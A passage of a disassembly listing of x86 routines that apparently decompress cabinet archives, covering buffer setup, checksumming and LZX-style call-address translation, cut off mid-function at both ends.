push dword ptr [esi]
call sub_1005350
loc_1004DEC: ; CODE XREF: sub_1004D05+8F�j
xor eax, eax
loc_1004DEE: ; CODE XREF: sub_1004D05+DA�j
pop edi
pop esi
pop ebx
retn 8
sub_1004D05 endp
; =============== S U B R O U T I N E =======================================
sub_1004DF4 proc near ; CODE XREF: sub_1004F1F+1C�p
; sub_1004F1F+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
mov esi, [esp+10h+arg_0]
mov bx, [esi+72h]
xor eax, eax
mov ax, [esi+70h]
push edi
lea edi, [esi+7BCh]
lea ecx, [esi+3B7h]
mov [edi+4], ecx
lea ecx, [esi+4B8h]
mov [edi+8], ecx
lea ecx, [esi+5B9h]
inc bx
mov [edi+0Ch], ecx
mov ecx, [esi+38h]
and dword ptr [edi+24h], 0
mov [esp+14h+var_4], eax
mov [edi+10h], ecx
mov [edi+1Eh], ax
mov [edi+20h], bx
loc_1004E40: ; CODE XREF: sub_1004DF4+D5�j
mov eax, [esi+84h]
and [esp+14h+arg_0], 0
cmp eax, 0FFFFFFFFh
jz short loc_1004E59
push eax
call dword ptr [esi+18h]
test eax, eax
pop ecx
jnz short loc_1004ED8
loc_1004E59: ; CODE XREF: sub_1004DF4+5A�j
lea ebp, [esi+88h]
mov eax, [ebp+0]
cmp eax, 0FFFFFFFFh
jz short loc_1004E70
push eax
call dword ptr [esi+18h]
test eax, eax
pop ecx
jnz short loc_1004ED8
loc_1004E70: ; CODE XREF: sub_1004DF4+71�j
or dword ptr [ebp+0], 0FFFFFFFFh
or dword ptr [esi+84h], 0FFFFFFFFh
push edi
push 4
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_1004EE7
push ebx
push [esp+18h+var_4]
lea eax, [esi+3B7h]
push eax
push esi
call sub_10049B0
test eax, eax
jz short loc_1004EAA
push 0
push esi
call sub_1004D05
test eax, eax
jnz short loc_1004EBA
loc_1004EAA: ; CODE XREF: sub_1004DF4+A8�j
mov eax, [esi]
cmp dword ptr [eax], 0Bh
jz short loc_1004EE3
xor ebp, ebp
inc ebp
mov [esp+14h+arg_0], ebp
jmp short loc_1004EBD
; ---------------------------------------------------------------------------
loc_1004EBA: ; CODE XREF: sub_1004DF4+B4�j
xor ebp, ebp
inc ebp
loc_1004EBD: ; CODE XREF: sub_1004DF4+C4�j
cmp [esp+14h+arg_0], 0
mov eax, [esi]
mov eax, [eax]
mov [edi+24h], eax
jnz loc_1004E40
inc word ptr [esi+0AEh]
jmp short loc_1004F05
; ---------------------------------------------------------------------------
loc_1004ED8: ; CODE XREF: sub_1004DF4+63�j
; sub_1004DF4+7A�j
push 0
push 4
loc_1004EDC: ; CODE XREF: sub_1004DF4+F7�j
push dword ptr [esi]
call sub_1005350
loc_1004EE3: ; CODE XREF: sub_1004DF4+BB�j
; sub_1004DF4+10F�j
xor eax, eax
jmp short loc_1004F17
; ---------------------------------------------------------------------------
loc_1004EE7: ; CODE XREF: sub_1004DF4+92�j
push 0
push 0Bh
jmp short loc_1004EDC
; ---------------------------------------------------------------------------
loc_1004EED: ; CODE XREF: sub_1004DF4+119�j
dec word ptr [esi+0ACh]
dec word ptr [esi+0AEh]
push esi
call sub_1004C74
test eax, eax
jz short loc_1004EE3
loc_1004F05: ; CODE XREF: sub_1004DF4+E2�j
cmp word ptr [esi+0AEh], 0
jnz short loc_1004EED
mov [esi+9Ch], ebp
mov eax, ebp
loc_1004F17: ; CODE XREF: sub_1004DF4+F1�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_1004DF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004F1F proc near ; CODE XREF: sub_1004FC0+48�p
; sub_1005021+37�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
add [esi+30h], eax
cmp word ptr [esi+0B0h], 0
jnz short loc_1004F44
push esi
call sub_1004DF4
test eax, eax
jz short loc_1004FB4
loc_1004F44: ; CODE XREF: sub_1004F1F+19�j
dec word ptr [esi+0B0h]
push 0
push esi
call sub_10043BE
test eax, eax
jz short loc_1004FB4
mov eax, [esi+48h]
cmp word ptr [eax+6], 0
jnz short loc_1004F84
push esi
call sub_1004DF4
test eax, eax
jz short loc_1004FB4
mov eax, [esi+48h]
movzx eax, word ptr [eax+4]
push eax
push esi
call sub_10043BE
test eax, eax
jz short loc_1004FB4
dec word ptr [esi+0B0h]
loc_1004F84: ; CODE XREF: sub_1004F1F+40�j
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push esi
call sub_10048B1
test eax, eax
jz short loc_1004FB4
mov eax, [esi+48h]
mov cx, word ptr [ebp+arg_0]
cmp cx, [eax+6]
jz short loc_1004FB8
push 0
push 7
push dword ptr [esi]
call sub_1005350
loc_1004FB4: ; CODE XREF: sub_1004F1F+23�j
; sub_1004F1F+36�j ...
xor eax, eax
jmp short loc_1004FBB
; ---------------------------------------------------------------------------
loc_1004FB8: ; CODE XREF: sub_1004F1F+88�j
xor eax, eax
inc eax
loc_1004FBB: ; CODE XREF: sub_1004F1F+97�j
pop esi
pop ebp
retn 4
sub_1004F1F endp
; =============== S U B R O U T I N E =======================================
sub_1004FC0 proc near ; CODE XREF: sub_1005021+2F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
cmp dword ptr [edi+9Ch], 0
jz short loc_1004FD3
xor eax, eax
inc eax
jmp short loc_100501D
; ---------------------------------------------------------------------------
loc_1004FD3: ; CODE XREF: sub_1004FC0+C�j
push esi
mov esi, [esp+8+arg_4]
mov eax, 0FFFEh
mov ecx, esi
and ecx, eax
cmp ecx, eax
jnz short loc_1004FEA
movzx esi, word ptr [edi+6Ah]
dec esi
loc_1004FEA: ; CODE XREF: sub_1004FC0+23�j
cmp [edi+90h], esi
jz short loc_1005019
push edi
call sub_1004850
test eax, eax
jz short loc_1005011
push esi
push edi
call sub_1004D05
test eax, eax
jz short loc_1005011
push edi
call sub_1004F1F
test eax, eax
jnz short loc_1005015
loc_1005011: ; CODE XREF: sub_1004FC0+3A�j
; sub_1004FC0+45�j
xor eax, eax
jmp short loc_100501C
; ---------------------------------------------------------------------------
loc_1005015: ; CODE XREF: sub_1004FC0+4F�j
and dword ptr [edi+30h], 0
loc_1005019: ; CODE XREF: sub_1004FC0+30�j
xor eax, eax
inc eax
loc_100501C: ; CODE XREF: sub_1004FC0+53�j
pop esi
loc_100501D: ; CODE XREF: sub_1004FC0+11�j
pop edi
retn 8
sub_1004FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005021 proc near ; CODE XREF: sub_1005170+169�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, [esi+74h]
test eax, eax
push edi
jz loc_10050DC
mov ebx, [esi+78h]
cmp ebx, [esi+30h]
mov [ebp+arg_0], eax
jnb short loc_100504A
mov dword ptr [esi+90h], 0FFFFh
loc_100504A: ; CODE XREF: sub_1005021+1D�j
movzx eax, word ptr [esi+7Ch]
push eax
push esi
call sub_1004FC0
jmp short loc_100505D
; ---------------------------------------------------------------------------
loc_1005057: ; CODE XREF: sub_1005021+4C�j
push esi
call sub_1004F1F
loc_100505D: ; CODE XREF: sub_1005021+34�j
test eax, eax
jz short loc_10050C0
mov eax, [esi+48h]
movzx eax, word ptr [eax+6]
add eax, [esi+30h]
cmp ebx, eax
jnb short loc_1005057
cmp [ebp+arg_0], 0
jz short loc_10050DC
loc_1005075: ; CODE XREF: sub_1005021+90�j
mov ecx, [esi+48h]
movzx edi, word ptr [ecx+6]
mov eax, ebx
sub eax, [esi+30h]
sub edi, eax
cmp edi, [ebp+arg_0]
jbe short loc_100508B
mov edi, [ebp+arg_0]
loc_100508B: ; CODE XREF: sub_1005021+65�j
mov ecx, [esi+40h]
push edi
add ecx, eax
push ecx
push dword ptr [esi+8Ch]
call dword ptr [esi+14h]
add esp, 0Ch
cmp edi, eax
jnz short loc_10050B5
add ebx, edi
sub [ebp+arg_0], edi
jz short loc_10050DC
push esi
call sub_1004F1F
test eax, eax
jnz short loc_1005075
jmp short loc_10050C0
; ---------------------------------------------------------------------------
loc_10050B5: ; CODE XREF: sub_1005021+7F�j
push 0
push 8
push dword ptr [esi]
call sub_1005350
loc_10050C0: ; CODE XREF: sub_1005021+3E�j
; sub_1005021+92�j
lea edi, [esi+8Ch]
mov eax, [edi]
cmp eax, 0FFFFFFFFh
jz short loc_10050D5
push eax
call dword ptr [esi+18h]
or dword ptr [edi], 0FFFFFFFFh
pop ecx
loc_10050D5: ; CODE XREF: sub_1005021+AA�j
; sub_1005021+138�j
xor eax, eax
jmp loc_1005169
; ---------------------------------------------------------------------------
loc_10050DC: ; CODE XREF: sub_1005021+E�j
; sub_1005021+52�j ...
lea eax, [esi+7BCh]
lea ecx, [esi+0B4h]
mov [eax+4], ecx
mov ecx, [esi+8Ch]
mov [eax+14h], ecx
mov cx, [esi+7Eh]
mov [eax+18h], cx
mov cx, [esi+80h]
mov [eax+1Ah], cx
mov cx, [esi+82h]
mov [eax+1Ch], cx
mov ecx, [esi+38h]
mov [eax+10h], ecx
mov cx, [esi+7Ch]
and dword ptr [eax], 0
xor edi, edi
mov [eax+22h], cx
mov cx, [eax+1Ch]
inc edi
test cl, 40h
jz short loc_100513A
and cx, 0FFBFh
mov [eax], edi
mov [eax+1Ch], cx
loc_100513A: ; CODE XREF: sub_1005021+10C�j
push eax
push 3
call dword ptr [esi+24h]
or dword ptr [esi+8Ch], 0FFFFFFFFh
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_100515E
push 0
push 0Bh
loc_1005152: ; CODE XREF: sub_1005021+144�j
push dword ptr [esi]
call sub_1005350
jmp loc_10050D5
; ---------------------------------------------------------------------------
loc_100515E: ; CODE XREF: sub_1005021+12B�j
test eax, eax
jnz short loc_1005167
push eax
push 8
jmp short loc_1005152
; ---------------------------------------------------------------------------
loc_1005167: ; CODE XREF: sub_1005021+13F�j
mov eax, edi
loc_1005169: ; CODE XREF: sub_1005021+B6�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_1005021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005170 proc near ; CODE XREF: start_0+2FB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_18]
push ebx
push esi
mov esi, [ebp+arg_0]
mov [esi+38h], eax
mov eax, [ebp+arg_10]
mov [esi+24h], eax
mov eax, [ebp+arg_14]
xor edx, edx
mov [esi+28h], eax
mov eax, [ebp+arg_8]
mov ecx, esi
sub ecx, eax
push edi
mov [ebp+var_4], edx
lea edi, [esi+7BCh]
mov [esi+0AEh], dx
lea ebx, [ecx+5B9h]
loc_10051AB: ; CODE XREF: sub_1005170+43�j
mov cl, [eax]
mov [ebx+eax], cl
inc eax
test cl, cl
jnz short loc_10051AB
push 0FFFFh
push edx
push [ebp+arg_4]
push esi
call sub_10049B0
test eax, eax
jz loc_100531D
and dword ptr [esi+9Ch], 0
mov eax, [ebp+arg_8]
mov dword ptr [esi+90h], 0FFFFh
loc_10051E0: ; CODE XREF: sub_1005170+78�j
mov cl, [eax]
mov [ebx+eax], cl
inc eax
test cl, cl
jnz short loc_10051E0
push esi
call sub_1004577
test eax, eax
jz loc_100531D
xor ebx, ebx
jmp loc_1005302
; ---------------------------------------------------------------------------
loc_10051FF: ; CODE XREF: sub_1005170+182�j
; sub_1005170+199�j
dec word ptr [esi+0ACh]
push esi
call sub_1004C74
test eax, eax
jz loc_100531D
lea eax, [esi+0B4h]
mov [edi+4], eax
mov eax, [esi+74h]
mov [edi], eax
lea eax, [esi+1B5h]
mov [edi+8], eax
lea eax, [esi+2B6h]
mov [edi+0Ch], eax
mov ax, [esi+7Eh]
mov [edi+18h], ax
mov ax, [esi+80h]
mov [edi+1Ah], ax
mov ax, [esi+82h]
mov [edi+1Ch], ax
mov eax, [esi+38h]
mov [edi+10h], eax
mov ax, [esi+7Ch]
mov [edi+22h], ax
mov ax, [esi+7Ch]
and ax, 0FFFDh
cmp ax, 0FFFDh
jnz short loc_10052A9
cmp [esi+9Ch], ebx
push edi
jnz short loc_10052C2
push 1
call [ebp+arg_10]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_10052EB
loc_1005283: ; CODE XREF: sub_1005170+162�j
push ebx
push 0Bh
push dword ptr [esi]
call sub_1005350
jmp loc_100531D
; ---------------------------------------------------------------------------
loc_1005292: ; CODE XREF: sub_1005170+166�j
mov ax, [esi+7Ch]
and ax, 0FFFEh
cmp ax, 0FFFEh
jnz short loc_10052EB
inc word ptr [esi+0AEh]
jmp short loc_10052EB
; ---------------------------------------------------------------------------
loc_10052A9: ; CODE XREF: sub_1005170+FC�j
cmp [esi+9Ch], ebx
jnz short loc_10052E4
mov ax, [edi+22h]
cmp ax, [esi+6Ah]
jb short loc_10052C1
cmp ax, 0FFFCh
jb short loc_10052EB
loc_10052C1: ; CODE XREF: sub_1005170+149�j
push edi
loc_10052C2: ; CODE XREF: sub_1005170+105�j
push 2
call [ebp+arg_10]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
mov [esi+8Ch], eax
jz short loc_1005283
cmp eax, ebx
jz short loc_1005292
push esi
call sub_1005021
test eax, eax
jz short loc_100531D
jmp short loc_10052EB
; ---------------------------------------------------------------------------
loc_10052E4: ; CODE XREF: sub_1005170+13F�j
mov [esi+0ACh], bx
loc_10052EB: ; CODE XREF: sub_1005170+111�j
; sub_1005170+12E�j ...
cmp [esi+0ACh], bx
jnz loc_10051FF
push esi
call sub_1004577
test eax, eax
jz short loc_100531D
loc_1005302: ; CODE XREF: sub_1005170+8A�j
cmp [esi+0ACh], bx
jnz loc_10051FF
dec word ptr [esi+0ACh]
mov [ebp+var_4], 1
loc_100531D: ; CODE XREF: sub_1005170+56�j
; sub_1005170+82�j ...
mov eax, [esi+88h]
or ebx, 0FFFFFFFFh
cmp eax, ebx
jz short loc_100532F
push eax
call dword ptr [esi+18h]
pop ecx
loc_100532F: ; CODE XREF: sub_1005170+1B8�j
lea edi, [esi+84h]
mov eax, [edi]
cmp eax, ebx
jz short loc_1005340
push eax
call dword ptr [esi+18h]
pop ecx
loc_1005340: ; CODE XREF: sub_1005170+1C9�j
mov eax, [ebp+var_4]
mov [edi], ebx
pop edi
mov [esi+88h], ebx
pop esi
pop ebx
leave
retn
sub_1005170 endp
; =============== S U B R O U T I N E =======================================
sub_1005350 proc near ; CODE XREF: sub_1004202+1B�p
; sub_1004292+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov [eax], ecx
mov ecx, [esp+arg_8]
mov [eax+4], ecx
mov dword ptr [eax+8], 1
retn 0Ch
sub_1005350 endp
; =============== S U B R O U T I N E =======================================
sub_100536B proc near ; CODE XREF: sub_10043BE+7F�p
; sub_10043BE+96�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
mov eax, esi
shr eax, 2
test eax, eax
push edi
mov edi, [esp+8+arg_8]
jle short loc_10053A6
push ebx
loc_1005383: ; CODE XREF: sub_100536B+38�j
movzx edx, byte ptr [ecx]
xor ebx, ebx
inc ecx
mov bh, [ecx]
or edx, ebx
inc ecx
movzx ebx, byte ptr [ecx]
shl ebx, 10h
or edx, ebx
inc ecx
movzx ebx, byte ptr [ecx]
shl ebx, 18h
or edx, ebx
inc ecx
xor edi, edx
dec eax
jnz short loc_1005383
pop ebx
loc_10053A6: ; CODE XREF: sub_100536B+15�j
and esi, 3
xor eax, eax
dec esi
jz short loc_10053C2
dec esi
jz short loc_10053BB
dec esi
jnz short loc_10053C7
movzx eax, byte ptr [ecx]
shl eax, 10h
inc ecx
loc_10053BB: ; CODE XREF: sub_100536B+44�j
xor edx, edx
mov dh, [ecx]
or eax, edx
inc ecx
loc_10053C2: ; CODE XREF: sub_100536B+41�j
movzx ecx, byte ptr [ecx]
or eax, ecx
loc_10053C7: ; CODE XREF: sub_100536B+47�j
xor eax, edi
pop edi
pop esi
retn 0Ch
sub_100536B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10053CE proc near ; CODE XREF: sub_100468F+66�p
; sub_100468F+133�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_10]
add eax, 1800h
mov [ecx], eax
mov eax, [ebp+arg_14]
test eax, eax
jnz short loc_10053E9
pop ebp
retn
; ---------------------------------------------------------------------------
loc_10053E9: ; CODE XREF: sub_10053CE+17�j
and dword ptr [eax], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
push 2Ch
call edi
mov esi, eax
test esi, esi
pop ecx
jnz short loc_1005405
loc_10053FD: ; CODE XREF: sub_10053CE+AE�j
xor eax, eax
inc eax
jmp loc_1005488
; ---------------------------------------------------------------------------
loc_1005405: ; CODE XREF: sub_10053CE+2D�j
push 2EFCh
call edi
test eax, eax
pop ecx
mov [ebp+arg_10], eax
mov [esi+28h], eax
jnz short loc_100541D
push esi
call [ebp+arg_C]
jmp short loc_100547B
; ---------------------------------------------------------------------------
loc_100541D: ; CODE XREF: sub_10053CE+47�j
push [ebp+arg_28]
mov eax, [ebp+arg_1C]
push [ebp+arg_24]
mov edx, [ebp+arg_18]
push [ebp+arg_20]
mov ebx, [ebp+arg_C]
push [ebp+arg_1C]
mov ecx, [ebp+arg_4]
mov [esi+10h], eax
mov eax, [ebp+arg_20]
mov [esi+14h], eax
mov eax, [ebp+arg_24]
mov [esi+18h], eax
mov eax, [ebp+arg_28]
mov [esi+1Ch], eax
mov eax, [ebp+arg_0]
mov [esi+4], edi
mov [esi+8], ebx
mov [esi+0Ch], edx
mov eax, [eax]
push edx
push ebx
mov [esi+20h], eax
mov eax, [ecx+4]
push edi
mov [esi+24h], eax
mov dword ptr [esi], 4349444Ch
push dword ptr [ecx]
push [ebp+arg_10]
call sub_10055A6
test eax, eax
jnz short loc_1005481
push esi
call ebx
loc_100547B: ; CODE XREF: sub_10053CE+4D�j
pop ecx
jmp loc_10053FD
; ---------------------------------------------------------------------------
loc_1005481: ; CODE XREF: sub_10053CE+A8�j
mov eax, [ebp+arg_14]
mov [eax], esi
xor eax, eax
loc_1005488: ; CODE XREF: sub_10053CE+32�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_10053CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100548D proc near ; CODE XREF: sub_10048B1+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
cmp dword ptr [ecx], 4349444Ch
jz short loc_10054A5
push 2
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_10054A5: ; CODE XREF: sub_100548D+11�j
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
cmp eax, [ecx+20h]
jbe short loc_10054B5
push 3
pop eax
jmp short loc_10054D8
; ---------------------------------------------------------------------------
loc_10054B5: ; CODE XREF: sub_100548D+21�j
lea edx, [ebp+var_4]
push edx
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
push dword ptr [ecx+28h]
call sub_100554A
mov ecx, [ebp+var_4]
neg eax
sbb eax, eax
mov [esi], ecx
and eax, 4
loc_10054D8: ; CODE XREF: sub_100548D+26�j
pop esi
leave
retn
sub_100548D endp
; =============== S U B R O U T I N E =======================================
sub_10054DB proc near ; CODE XREF: sub_1004850+36�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax], 4349444Ch
jz short loc_10054EB
push 2
pop eax
retn
; ---------------------------------------------------------------------------
loc_10054EB: ; CODE XREF: sub_10054DB+A�j
push dword ptr [eax+28h]
call sub_1005528
xor eax, eax
retn
sub_10054DB endp
; =============== S U B R O U T I N E =======================================
sub_10054F6 proc near ; CODE XREF: sub_1004620+36�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp dword ptr [esi], 4349444Ch
jz short loc_1005508
push 2
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_1005508: ; CODE XREF: sub_10054F6+B�j
push dword ptr [esi+28h]
call sub_1005523
push dword ptr [esi+28h]
and dword ptr [esi], 0
call dword ptr [esi+8]
push esi
call dword ptr [esi+8]
pop ecx
pop ecx
xor eax, eax
pop esi
retn
sub_10054F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1005523 proc near ; CODE XREF: sub_10054F6+15�p
jmp sub_100566D
sub_1005523 endp
; =============== S U B R O U T I N E =======================================
sub_1005528 proc near ; CODE XREF: sub_10054DB+13�p
; sub_10055A6+65�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_1005687
push esi
call sub_10056F6
push esi
call sub_100573B
and dword ptr [esi+2ECCh], 0
pop esi
retn 4
sub_1005528 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100554A proc near ; CODE XREF: sub_100548D+3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
push esi
mov esi, [ebp+arg_0]
mov [esi+2B04h], eax
lea eax, [eax+ecx+4]
mov [esi+2B08h], eax
mov eax, [ebp+arg_10]
push esi
mov [esi+2B0Ch], eax
call sub_1005A5C
push [ebp+arg_4]
push esi
call sub_10057F7
inc dword ptr [esi+2ECCh]
test eax, eax
jge short loc_1005594
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
xor eax, eax
inc eax
jmp short loc_10055A1
; ---------------------------------------------------------------------------
loc_1005594: ; CODE XREF: sub_100554A+3D�j
mov ecx, [ebp+arg_18]
mov [ecx], eax
add [esi+2B10h], eax
xor eax, eax
loc_10055A1: ; CODE XREF: sub_100554A+48�j
pop esi
pop ebp
retn 1Ch
sub_100554A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10055A6 proc near ; CODE XREF: sub_10053CE+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
mov [esi+2EE0h], eax
mov eax, [ebp+arg_C]
mov [esi+2EE4h], eax
mov eax, [ebp+arg_10]
mov [esi+2EE8h], eax
mov eax, [ebp+arg_14]
mov [esi+2EECh], eax
mov eax, [ebp+arg_18]
mov [esi+2EF0h], eax
mov eax, [ebp+arg_1C]
mov [esi+2EF4h], eax
mov eax, [ebp+arg_20]
mov [esi+2EF8h], eax
mov eax, [ebp+arg_4]
lea ecx, [eax-1]
test ecx, eax
mov [esi+4], eax
mov [esi+8], ecx
jnz short loc_1005606
push esi
call sub_1005618
test eax, eax
jnz short loc_100560A
loc_1005606: ; CODE XREF: sub_10055A6+54�j
xor eax, eax
jmp short loc_1005613
; ---------------------------------------------------------------------------
loc_100560A: ; CODE XREF: sub_10055A6+5E�j
push esi
call sub_1005528
xor eax, eax
inc eax
loc_1005613: ; CODE XREF: sub_10055A6+62�j
pop esi
pop ebp
retn 24h
sub_10055A6 endp
; =============== S U B R O U T I N E =======================================
sub_1005618 proc near ; CODE XREF: sub_10055A6+57�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov edx, [esi+4]
push edi
push 4
mov byte ptr [esi+2EB5h], 4
pop edi
loc_100562C: ; CODE XREF: sub_1005618+34�j
mov al, [esi+2EB5h]
movzx ecx, al
mov cl, ds:byte_1002278[ecx]
xor ebx, ebx
inc ebx
shl ebx, cl
add edi, ebx
inc al
cmp edi, edx
mov [esi+2EB5h], al
jb short loc_100562C
add edx, 105h
push edx
call dword ptr [esi+2EE0h]
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
pop edi
mov [esi], eax
pop esi
pop ebx
mov eax, ecx
retn 4
sub_1005618 endp
; =============== S U B R O U T I N E =======================================
sub_100566D proc near ; CODE XREF: sub_1005523�j
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
test eax, eax
jz short loc_1005683
push eax
call dword ptr [esi+2EE4h]
and dword ptr [esi], 0
pop ecx
loc_1005683: ; CODE XREF: sub_100566D+9�j
pop esi
retn 4
sub_100566D endp
; =============== S U B R O U T I N E =======================================
sub_1005687 proc near ; CODE XREF: sub_1005528+6�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
movzx ecx, byte ptr [edx+2EB5h]
lea ecx, ds:100h[ecx*8]
push esi
push edi
mov esi, ecx
shr ecx, 2
xor eax, eax
lea edi, [edx+0A18h]
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
movzx ecx, byte ptr [edx+2EB5h]
lea ecx, ds:100h[ecx*8]
mov esi, ecx
shr ecx, 2
xor eax, eax
lea edi, [edx+2B14h]
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
push 3Eh
pop ecx
xor eax, eax
lea edi, [edx+0CB8h]
rep stosd
stosb
push 3Eh
pop ecx
xor eax, eax
lea edi, [edx+2DB4h]
rep stosd
stosb
pop edi
pop esi
retn 4
sub_1005687 endp
; =============== S U B R O U T I N E =======================================
sub_10056F6 proc near ; CODE XREF: sub_1005528+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor edx, edx
xor ecx, ecx
inc ecx
mov [eax+0Ch], ecx
mov [eax+10h], ecx
mov [eax+14h], ecx
mov [eax+2EC0h], edx
mov [eax+2B10h], edx
mov [eax+2EDCh], ecx
mov [eax+2ED4h], edx
mov [eax+2ED8h], edx
mov [eax+2EB8h], ecx
mov [eax+2EC4h], edx
mov [eax+2EBCh], edx
retn 4
sub_10056F6 endp
; =============== S U B R O U T I N E =======================================
sub_100573B proc near ; CODE XREF: sub_1005528+12�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax+2EC8h], 0
retn 4
sub_100573B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005749 proc near ; CODE XREF: sub_1006720+44�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_8]
cmp edx, 6
jg short loc_1005764
mov eax, [ebp+arg_0]
add [eax+2EC8h], edx
jmp locret_10057F3
; ---------------------------------------------------------------------------
loc_1005764: ; CODE XREF: sub_1005749+B�j
mov ecx, [ebp+arg_4]
push ebx
push esi
lea ebx, [ecx+edx]
push edi
mov [ebp+arg_8], ebx
add ebx, 0FFFFFFFAh
mov esi, ebx
lea edi, [ebp+var_8]
movsd
movsw
mov eax, 0E8E8E8E8h
mov edi, ebx
stosd
stosw
mov eax, [ebp+arg_0]
mov esi, [eax+2EC8h]
lea edx, [esi+edx-0Ah]
mov [ebp+arg_0], edx
jmp short loc_100579E
; ---------------------------------------------------------------------------
loc_1005797: ; CODE XREF: sub_1005749+58�j
inc ecx
inc dword ptr [eax+2EC8h]
loc_100579E: ; CODE XREF: sub_1005749+4C�j
; sub_1005749+90�j
cmp byte ptr [ecx], 0E8h
jnz short loc_1005797
mov edi, [eax+2EC8h]
inc ecx
cmp edi, edx
jnb short loc_10057DB
mov edx, [ecx]
mov esi, [eax+2EC4h]
cmp edx, esi
jnb short loc_10057C0
sub edx, edi
mov [ecx], edx
jmp short loc_10057CC
; ---------------------------------------------------------------------------
loc_10057C0: ; CODE XREF: sub_1005749+6F�j
mov ebx, edx
neg ebx
cmp ebx, edi
ja short loc_10057CC
add esi, edx
mov [ecx], esi
loc_10057CC: ; CODE XREF: sub_1005749+75�j
; sub_1005749+7D�j
mov edx, [ebp+arg_0]
add ecx, 4
add dword ptr [eax+2EC8h], 5
jmp short loc_100579E
; ---------------------------------------------------------------------------
loc_10057DB: ; CODE XREF: sub_1005749+63�j
mov edi, [ebp+arg_8]
add edx, 0Ah
add edi, 0FFFFFFFAh
mov [eax+2EC8h], edx
lea esi, [ebp+var_8]
movsd
movsw
pop edi
pop esi
pop ebx
locret_10057F3: ; CODE XREF: sub_1005749+16�j
leave
retn 0Ch
sub_1005749 endp
; =============== S U B R O U T I N E =======================================
sub_10057F7 proc near ; CODE XREF: sub_100554A+30�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
